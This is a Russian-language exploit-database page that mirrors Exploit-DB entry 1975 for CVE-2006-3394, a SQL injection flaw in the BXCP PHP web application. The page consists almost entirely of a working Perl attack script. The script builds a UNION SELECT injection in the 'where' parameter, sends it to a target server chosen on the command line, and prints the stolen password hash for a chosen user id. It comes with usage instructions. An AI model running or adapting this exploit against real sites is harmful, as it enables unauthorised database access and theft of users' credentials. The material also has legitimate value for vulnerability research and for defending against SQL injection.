- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 1975
- Проверка EDB
-
- Пройдено
- Автор
- X23
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-3394
- Дата публикации
- 2006-07-02
Код:
#!/usr/bin/perl
use IO::Socket;
print q{
-------------------------------------------------------------------------------------
BXCP exploit by x23 ~ curse-crew.de ~ geekbar.cx.la ~ geeknet.uttx.net
use: bxcp.pl [server] [dir] [id]
sample:
$ perl bxcp.pl bxcp.com / 1
~ connecting
~ exploiting
~ hash: *censored* ;D
-------------------------------------------------------------------------------------
};
$webpage = $ARGV[0];
$directory = $ARGV[1];
$vic_id = $ARGV[2];
if (!$vic_id) { die "~ read how to use ;)\n"; }
$get = "http://".$webpage.$directory."index.php?mod=files&action=view&where=-1+UNION+";
$get .= "SELECT+users_nick,0,users_pwd,0,0,0,0,0,0,0,0,0,0,0,0+FROM+{pre}_users+WHERE+users_id=";
$get .= $vic_id;
print "~ connecting\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage",
PeerPort=>"80") || die "[+] Can't connect to Server\n";
print "~ exploiting\n";
print $sock "GET $get HTTP/1.1\n";
print $sock "Host: $webpage\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4\n";
print $sock "Connection: close\n\n";
while ($answer = <$sock>) {
#print $answer;
if ($answer =~ /([0-9a-f]{32})\n/) {
print "~ hash: $1\n";
break;
}
}
close($sock);
# milw0rm.com [2006-07-02]
- Источник
- www.exploit-db.com